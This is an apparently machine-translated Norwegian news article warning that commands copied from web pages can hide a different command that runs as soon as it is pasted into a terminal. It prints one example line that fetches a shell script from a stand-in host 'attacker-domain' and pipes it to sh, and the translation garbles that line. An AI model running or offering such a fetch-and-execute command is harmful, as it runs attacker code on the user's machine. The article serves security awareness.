- Vi kopierer og limer alle inn fra internett på daglig basis uten å vite risikoen.
- En sikkerhetsekspert tok seg tid til å vise alle et worst-case scenario når de gjorde dette.
- Å lime inn kommandoer du fikk fra internett i terminalen din er en rask måte å bli hacket på
- Kommandoene du trodde du limte inn i terminalen din, er faktisk ondsinnede koder.
Det er sant at vi lever i en tid der hastighet er alt, og å få raske resultater er alt som betyr noe. Imidlertid er det få som faktisk stopper opp et sekund og tenker på konsekvenser.
På daglig basis utfører millioner av programmerere, administratorer og sikkerhetsforskere enkle oppgaver som å kopiere og lime inn kommandoer fra nettsider direkte inn i konsoller på PC-ene sine.
Selv om mange ikke engang tenker over dette, er implikasjonene større og mer farlige enn du kanskje tror med det første, spesielt hvis du lagrer sensitive eller verdifulle data.
En kjent sikkerhetsekspert tok seg tid til å dele hva som faktisk kan skje hvis du kopierer+limer inn innhold fra nettsider.
Copy+Paste er en enkel måte å faktisk bli hacket på
Gabriel Friedlander, som er grunnleggeren av opplæringsplattformen for sikkerhetsbevissthet Wizer, trakk dekselet av et opplegg som får deg til å tenke deg om to ganger før du kopierer og limer inn kommandoer fra nettsider.
Å kopiere og lime inn innhold fra internett har blitt så vanlig i dag at ingen tenker over det.
Friedlander advarer imidlertid om at enkelte nettsider er mer svikefulle enn man kanskje tror med det første, og det du tror du kopierte fra den er veldig forskjellig fra det du faktisk gjorde.
Og det verste med alt dette er at, uten nødvendig kunnskap eller veiledning, innser ofrene feilen først etter å ha limt inn teksten, og da kan det allerede være for sent.
Sikkerhetsanalytikeren laget også en liten test for bloggleserne sine, bare slik at folk faktisk kan forstå hvor lett det er for deg å motvillig åpne døren for nettkriminelle.
Han ga en kommando som er ment å bli kopiert, men den aktuelle sannheten blir først avdekket når du limer inn teksten og ser hva du faktisk introduserte i oppsettet ditt.
Etter å ha kopiert kommandoen vist i skjermbildet ovenfor, vil resultatet av å lime den inn sjokkere deg, siden det er langt fra det du trodde du dupliserte.
krølle http://attacker-domain: 8000/shell.sh | shI tillegg til den helt andre kommandoen som finnes på utklippstavlen din, er nylinjetegnet (eller retur) ved slutten av det betyr at eksemplet ovenfor vil kjøre så snart det limes direkte inn i en Linux terminal.
Så du bør være mer bevisst på hva som faktisk skjer og behandle dette som en alvorlig sikkerhetsrisiko. Vi sier ikke at alle nettsteder skjuler skadelig innhold, men det lønner seg å ta dette i betraktning.
Har du noen gang blitt hacket fra å lime inn skumle kommandoer i terminalen din? Del opplevelsen din med oss i kommentarfeltet nedenfor.
